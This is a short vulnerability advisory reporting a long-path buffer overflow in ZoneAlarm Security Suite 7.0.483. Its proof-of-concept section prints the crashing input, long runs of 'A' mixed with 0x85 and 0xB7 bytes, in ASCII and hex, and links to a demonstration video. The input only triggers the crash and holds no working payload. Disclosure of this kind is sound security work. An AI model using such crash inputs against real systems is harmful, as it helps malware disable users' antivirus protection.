Application: ZoneAlarm Security Suite OS: Windows Xp (All patches a day) ------------------------------------------------------ 1 - Description 2 - Vulnerability 3 - POC/EXPLOIT ------------------------------------------------------ Description The zonealarm is a known firewall, which in the version "security suite" brings some tools as an antivirus, antispam and so on. Details of the version ZoneAlarm Security Suite versión:7.0.483.000 Versión de TrueVector:7.0.483.000 Versión del controlador:7.0.483.000 Versión de motor anti-virus:3 Versión de motor antivirus:5.0.1.85 Versión de archivo DAT de firma de anti-virus 915051681 Versión de motor de protección contra programas espía:5.0.189.0 Versión de archivo DAT de firma de protección contra programas espía 01.200801.3195 Versión de AntiSpam 5.0.6.8903 ------------------------------------------------------ Vulnerability The vulnerability is caused because the program can not analyze very long paths. This causes a buffer overflow with the possibility of execution of code. The flaw could be exploited by malware to leave without protection to the system for instance. ------------------------------------------------------ POC/EXPLOIT Here you can view a video proof of concept http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf Strings ASCII: · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … A · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 ASCII: ……………………………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 ------------------------------------------------------ Juan Pablo Lopez Yacubian